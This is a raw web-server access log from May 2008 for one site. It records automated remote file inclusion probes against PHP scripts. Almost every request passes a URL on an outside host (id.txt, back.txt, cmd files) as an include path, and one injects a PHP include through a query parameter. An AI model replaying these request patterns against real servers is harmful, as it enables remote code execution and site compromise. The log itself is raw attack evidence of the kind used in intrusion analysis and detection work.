211.10.17.19 - - [29/May/2008:09:58:33 -0700] "GET //index.php?pagina=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:58:37 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:58:37 -0700] "GET //includes/messages.inc.php?include_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:58:41 -0700] "GET /logs/access_080310.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:09:58:45 -0700] "GET /logs//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:09:58:46 -0700] "GET //homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:59:06 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:59:06 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:59:07 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:09:59:07 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:59:12 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:59:14 -0700] "GET /logs/access.log/main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:59:15 -0700] "GET /main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:59:15 -0700] "GET /logs/main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:09:59:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:09:59:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:59:36 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.148.252.24 - - [29/May/2008:09:59:40 -0700] "GET //includes/messages.inc.php?include_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:59:41 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:59:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:09:59:53 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:09:59:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:09:59:54 -0700] "GET //ashnews.php?pathtoashnews=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:09:59:56 -0700] "GET /index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:09:59:58 -0700] "GET /logs/index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [29/May/2008:09:59:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:59:58 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.74.155 - - [29/May/2008:09:59:59 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 6205 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
209.62.26.18 - - [29/May/2008:10:00:27 -0700] "GET /logs/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:10:00:28 -0700] "GET /main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:10:00:43 -0700] "GET /logs//admin/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:10:00:43 -0700] "GET //admin/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:01:14 -0700] "GET /logs/access_080209.log/index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:01:25 -0700] "GET /logs/access_080118.log//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:01:25 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:01:49 -0700] "GET /logs/access_080216.log/main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:02:07 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:02:07 -0700] "GET //skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:02:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:02:15 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:02:15 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:02:16 -0700] "GET /logs/main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:02:16 -0700] "GET /main.php?x=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:02:24 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:02:35 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:02:38 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:02:39 -0700] "GET /logs/print.php?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:02:39 -0700] "GET /logs/access_080105.log/print.php?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:02:39 -0700] "GET /print.php?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.158.238.99 - - [29/May/2008:10:02:44 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:02:46 -0700] "GET /logs/access.log/main.php?x=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.163.193.212 - - [29/May/2008:10:02:46 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:02:58 -0700] "GET /logs/access_080225.log/print.php?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.163.193.212 - - [29/May/2008:10:02:58 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:10:03:10 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:03:20 -0700] "GET /logs/access_080117.log//login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:03:20 -0700] "GET //login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:03:30 -0700] "GET /logs//login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:04:16 -0700] "GET /logs/access_080320.log//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:04:16 -0700] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:04:16 -0700] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:04:17 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:04:17 -0700] "GET /logs/access_080118.log//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:04:17 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:04:25 -0700] "GET /logs/access_080216.log/main.php?x=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:04:26 -0700] "GET /logs/index.php?redir=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:04:34 -0700] "GET /index.php?redir=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:10:04:52 -0700] "GET /logs/main.php?x=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:10:04:52 -0700] "GET /main.php?x=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:10:04:52 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:10:04:52 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:04:55 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:04:59 -0700] "GET /logs/access_080131.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:04:59 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:05:00 -0700] "GET /logs/access_080118.log//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:05:00 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:05:00 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:05:06 -0700] "GET /logs/access_071220.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:05:13 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:05:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:05:14 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:05:16 -0700] "GET /logs//lang_main_album.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:05:16 -0700] "GET //lang_main_album.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:10:05:26 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:10:05:26 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:05:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:05:27 -0700] "GET //ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:10:05:28 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:10:05:28 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:05:39 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:05:40 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:05:40 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:05:42 -0700] "GET /logs//login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:05:42 -0700] "GET //login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:05:49 -0700] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:10:05:50 -0700] "GET /logs/access_080220.log//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:06:13 -0700] "GET //phphtml.php?htmlclass_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.7.193.199 - - [29/May/2008:10:06:14 -0700] "GET /logs//calendar/events/header.inc.php?serverPath=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.193.199 - - [29/May/2008:10:06:14 -0700] "GET //calendar/events/header.inc.php?serverPath=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.136.6.38 - - [29/May/2008:10:06:15 -0700] "GET /logs//phphtml.php?htmlclass_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:06:24 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:06:24 -0700] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:06:24 -0700] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:06:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 200 4139 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:10:06:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:06:28 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:06:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:06:34 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:10:06:36 -0700] "GET /logs/access_080216.log//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.193.199 - - [29/May/2008:10:06:53 -0700] "GET /nphp/nphpd.php?nphp_config[LangFile]=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.90.73.127 - - [29/May/2008:10:06:53 -0700] "GET /logs/access_080103.log//login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [29/May/2008:10:06:54 -0700] "GET /logs/nphp/nphpd.php?nphp_config[LangFile]=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:06:56 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:06:57 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:07:23 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:07:24 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:07:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
